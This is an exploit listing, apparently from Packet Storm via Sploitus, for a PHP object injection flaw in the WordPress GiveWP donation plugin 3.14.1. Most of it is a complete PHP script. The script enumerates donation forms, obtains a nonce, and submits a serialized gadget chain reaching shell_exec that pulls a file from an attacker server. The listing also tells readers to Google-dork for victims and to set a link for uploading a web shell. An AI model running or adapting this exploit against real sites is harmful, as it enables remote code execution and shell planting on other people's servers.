Exploit for WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection

Name: Exploit for WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection
Rating: 5 (113 reviews)
2024-10-03 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:181985
=============================================================================================================================================  
| # Title : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://givewp.com/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following php code Upload shell file from external link.  
  
[+] Line 78 set your file link.  
  
[+] Line 127. set your target.  
  
[+] save code as poc.php .  
  
[+] USage : cmd = php poc.php .  
  
[+] PayLoad :  
  
  
<?php  
class GiveWPExploit {  
private $targetUrl;  
private $headers;  
  
public function __construct($targetUrl) {  
$this->targetUrl = $targetUrl;  
$this->headers = array(  
'Content-Type: application/x-www-form-urlencoded'  
);  
}  
  
public function check() {  
$response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search'));  
if (!$response || $response['http_code'] != 200) {  
echo "Failed to retrieve form list.\n";  
return false;  
}  
  
$forms = json_decode($response['body'], true);  
if (empty($forms)) {  
echo "No forms found.\n";  
return false;  
}  
  
echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . "\n";  
return $forms;  
}  
  
public function exploit() {  
$forms = $this->check();  
if (!$forms) {  
return;  
}  
  
$selectedForm = $forms[array_rand($forms)];  
$validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']);  
  
if (!$validForm) {  
echo "Failed to retrieve a valid form for exploitation.\n";  
return;  
}  
  
echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation.\n";  
$this->sendExploitRequest($validForm);  
}  
  
private function retrieveAndAnalyzeForm($formId) {  
$response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array(  
'action' => 'give_donation_form_nonce',  
'give_form_id' => $formId  
));  
  
if (!$response || $response['http_code'] != 200) {  
return false;  
}  
  
$formData = json_decode($response['body'], true);  
$giveFormId = $formId;  
$giveFormHash = $formData['data'];  
$givePriceId = '0'; // Default price ID  
$giveAmount = '$10.00'; // Default amount  
  
if (!$giveFormHash) {  
return false;  
}  
  
return array(  
'give_form_id' => $giveFormId,  
'give_form_hash' => $giveFormHash,  
'give_price_id' => $givePriceId,  
'give_amount' => $giveAmount  
);  
}  
  
private function sendExploitRequest($validForm) {  
// URL of the malicious file to be fetched  
$remoteFileUrl = 'http://attacker-server.com/malicious-file.php';  
  
// Payload that uses file_get_contents to fetch the remote file  
$payload = sprintf(  
'O:19:"Stripe\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\Onboarding\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}',  
strlen($remoteFileUrl),  
$remoteFileUrl  
);  
  
$data = array(  
'give-form-id' => $validForm['give_form_id'],  
'give-form-hash' => $validForm['give_form_hash'],  
'give-price-id' => $validForm['give_price_id'],  
'give-amount' => $validForm['give_amount'],  
'give_first' => 'Test',  
'give_last' => 'User',  
'give_email' => 'test@example.com',  
'give_title' => $payload,  
'give-gateway' => 'offline',  
'action' => 'give_process_donation'  
);  
  
$this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data);  
}  
  
private function sendRequest($method, $url, $data) {  
$options = array(  
'http' => array(  
'method' => $method,  
'header' => implode("\r\n", $this->headers),  
'content' => http_build_query($data)  
)  
);  
  
$context = stream_context_create($options);  
$result = file_get_contents($url, false, $context);  
  
if ($result === false) {  
return false;  
}  
  
return array(  
'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code  
'body' => $result  
);  
}  
}  
  
// Usage  
$exploit = new GiveWPExploit('http://127.0.0.1');  
$exploit->exploit();  
?>  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================